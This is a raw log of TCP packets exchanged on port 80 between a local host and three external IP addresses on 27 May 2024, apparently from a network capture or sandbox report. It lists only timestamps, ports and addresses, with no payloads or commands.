May 27, 2024 12:20:14.581607103 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.581630945 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.581887960 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.581928015 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.581938982 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.581957102 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.581963062 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.581994057 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.582317114 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.582336903 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.582349062 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.582382917 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.582707882 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.582717896 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.582752943 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.582828045 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.582838058 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.582870960 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.582973957 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.583018064 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.583043098 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.583053112 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.583065033 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.583089113 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.583369017 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.583406925 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.583412886 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.583416939 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.583427906 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.583451986 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.583817005 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.583852053 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.583859921 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.583863974 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.583899975 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.583913088 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.584084988 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.584095955 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.584106922 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.584120035 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.584142923 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.584419012 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.584439993 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.584460020 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.584470034 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.584481001 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.584512949 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.584738970 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.584784985 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.584794998 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.584805965 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.584820032 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.584839106 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.585325956 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.585346937 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.585362911 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.585391998 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.661477089 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661494970 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661509037 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661521912 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661616087 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661637068 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661650896 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661662102 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661673069 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661684990 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661696911 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661708117 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661720037 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661730051 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661741018 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661737919 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.661737919 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.661737919 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.661737919 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.661737919 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.661737919 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.661753893 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661767006 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.661777973 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.661801100 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.697242022 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.697257996 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.697268963 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.697279930 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.697292089 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.697303057 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.697398901 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.697426081 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.697735071 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.697746992 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.697788000 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.697892904 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.697904110 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.697915077 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.697926998 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.697938919 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.697961092 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.698453903 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.698467016 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.698484898 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.698498964 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.698522091 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.698538065 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.698625088 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.698638916 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.698687077 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.699251890 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.699264050 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.699275970 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.699285984 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.699299097 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.699309111 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.699348927 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.699348927 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.699383020 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.699397087 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.700372934 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.700386047 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.700397968 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.700417042 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.700440884 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.719290018 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719439983 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719453096 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719465017 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719476938 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719484091 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.719485044 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719500065 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.719517946 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.719599009 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719610929 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719628096 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719639063 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719669104 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.719691038 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.719763041 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719775915 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719785929 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719799042 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719811916 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719815016 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.719822884 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719834089 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719842911 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.719850063 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719861031 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.719886065 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.719944000 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719955921 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719968081 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719979048 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.719990969 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720002890 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720004082 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720016003 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720030069 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720072031 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720072031 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720102072 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720113993 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720124960 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720138073 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720148087 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720222950 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720272064 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720283031 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720293999 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720305920 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720315933 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720316887 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720330000 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720343113 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720366955 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720443010 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720454931 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720464945 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720477104 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720488071 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720494032 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720501900 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720513105 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720514059 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720529079 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720541000 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720578909 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720592976 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720606089 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720642090 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720756054 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720768929 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720779896 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720792055 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720803976 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720815897 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720818043 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720825911 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720827103 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720838070 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720849991 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720859051 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720864058 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720876932 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.720885992 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720906973 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.720932961 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.727420092 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.728445053 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:14.728492022 CEST	49722	80	192.168.2.12	31.31.198.106
May 27, 2024 12:20:14.732897997 CEST	80	49722	31.31.198.106	192.168.2.12
May 27, 2024 12:20:38.515212059 CEST	49724	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:38.520240068 CEST	80	49724	89.42.218.92	192.168.2.12
May 27, 2024 12:20:38.520474911 CEST	49724	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:38.522320986 CEST	49724	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:38.527242899 CEST	80	49724	89.42.218.92	192.168.2.12
May 27, 2024 12:20:40.035340071 CEST	49724	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:40.042496920 CEST	80	49724	89.42.218.92	192.168.2.12
May 27, 2024 12:20:40.042581081 CEST	49724	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:41.053750992 CEST	49725	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:41.058868885 CEST	80	49725	89.42.218.92	192.168.2.12
May 27, 2024 12:20:41.059003115 CEST	49725	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:41.065351009 CEST	49725	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:41.070225954 CEST	80	49725	89.42.218.92	192.168.2.12
May 27, 2024 12:20:42.580352068 CEST	80	49725	89.42.218.92	192.168.2.12
May 27, 2024 12:20:42.580368042 CEST	80	49725	89.42.218.92	192.168.2.12
May 27, 2024 12:20:42.580380917 CEST	80	49725	89.42.218.92	192.168.2.12
May 27, 2024 12:20:42.580394030 CEST	80	49725	89.42.218.92	192.168.2.12
May 27, 2024 12:20:42.580473900 CEST	80	49725	89.42.218.92	192.168.2.12
May 27, 2024 12:20:42.580485106 CEST	80	49725	89.42.218.92	192.168.2.12
May 27, 2024 12:20:42.580522060 CEST	80	49725	89.42.218.92	192.168.2.12
May 27, 2024 12:20:42.580533028 CEST	80	49725	89.42.218.92	192.168.2.12
May 27, 2024 12:20:42.580533981 CEST	49725	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:42.580533981 CEST	49725	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:42.580545902 CEST	80	49725	89.42.218.92	192.168.2.12
May 27, 2024 12:20:42.580559969 CEST	80	49725	89.42.218.92	192.168.2.12
May 27, 2024 12:20:42.580605984 CEST	49725	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:42.580605984 CEST	49725	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:42.582148075 CEST	49725	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:42.585464001 CEST	80	49725	89.42.218.92	192.168.2.12
May 27, 2024 12:20:42.585484982 CEST	80	49725	89.42.218.92	192.168.2.12
May 27, 2024 12:20:42.585544109 CEST	49725	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:42.585544109 CEST	49725	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:43.608906984 CEST	49726	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:43.613945961 CEST	80	49726	89.42.218.92	192.168.2.12
May 27, 2024 12:20:43.614094019 CEST	49726	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:43.616141081 CEST	49726	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:43.621018887 CEST	80	49726	89.42.218.92	192.168.2.12
May 27, 2024 12:20:43.621134996 CEST	80	49726	89.42.218.92	192.168.2.12
May 27, 2024 12:20:45.129162073 CEST	49726	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:45.134727955 CEST	80	49726	89.42.218.92	192.168.2.12
May 27, 2024 12:20:45.134840012 CEST	49726	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:46.227689028 CEST	49727	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:46.390172005 CEST	80	49727	89.42.218.92	192.168.2.12
May 27, 2024 12:20:46.390263081 CEST	49727	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:46.392246008 CEST	49727	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:46.397109985 CEST	80	49727	89.42.218.92	192.168.2.12
May 27, 2024 12:20:47.831279993 CEST	80	49727	89.42.218.92	192.168.2.12
May 27, 2024 12:20:47.831475019 CEST	80	49727	89.42.218.92	192.168.2.12
May 27, 2024 12:20:47.831554890 CEST	49727	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:47.959830046 CEST	49727	80	192.168.2.12	89.42.218.92
May 27, 2024 12:20:47.964843988 CEST	80	49727	89.42.218.92	192.168.2.12
May 27, 2024 12:21:01.429214954 CEST	49728	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:01.435013056 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:01.435120106 CEST	49728	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:01.437177896 CEST	49728	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:01.443043947 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.040870905 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.040889025 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.040901899 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.040930033 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.040941000 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.040952921 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.040963888 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.040977001 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.040987968 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.040988922 CEST	49728	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:02.040998936 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.041054010 CEST	49728	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:02.045931101 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.045955896 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.046026945 CEST	49728	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:02.129743099 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.129760981 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.129776001 CEST	80	49728	50.116.86.54	192.168.2.12
May 27, 2024 12:21:02.129837036 CEST	49728	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:02.129889011 CEST	49728	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:02.941442013 CEST	49728	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:04.143384933 CEST	49729	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:04.357132912 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:04.357219934 CEST	49729	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:04.359190941 CEST	49729	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:04.377285004 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:04.961607933 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:04.961697102 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:04.961708069 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:04.961724997 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:04.961741924 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:04.961740017 CEST	49729	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:04.961751938 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:04.961765051 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:04.961771965 CEST	49729	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:04.961776972 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:04.961786032 CEST	49729	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:04.961787939 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:04.961800098 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:04.961826086 CEST	49729	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:04.961848021 CEST	49729	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:04.967379093 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:04.967391968 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:04.967469931 CEST	49729	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:04.968014956 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:05.019500017 CEST	49729	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:05.048460960 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:05.048496962 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:05.048583984 CEST	49729	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:05.048610926 CEST	80	49729	50.116.86.54	192.168.2.12
May 27, 2024 12:21:05.048654079 CEST	49729	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:05.863617897 CEST	49729	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:06.884711027 CEST	49730	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:07.021437883 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.021584034 CEST	49730	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:07.027299881 CEST	49730	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:07.032207012 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.032396078 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.627377987 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.627456903 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.627469063 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.627480984 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.627492905 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.627504110 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.627515078 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.627526999 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.627537012 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.627551079 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.627567053 CEST	49730	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:07.627592087 CEST	49730	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:07.627616882 CEST	49730	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:07.641701937 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.641721964 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.641822100 CEST	49730	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:07.723088980 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.723170042 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.723184109 CEST	80	49730	50.116.86.54	192.168.2.12
May 27, 2024 12:21:07.723225117 CEST	49730	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:07.723253012 CEST	49730	80	192.168.2.12	50.116.86.54
May 27, 2024 12:21:08.535492897 CEST	49730	80	192.168.2.12	50.116.86.54
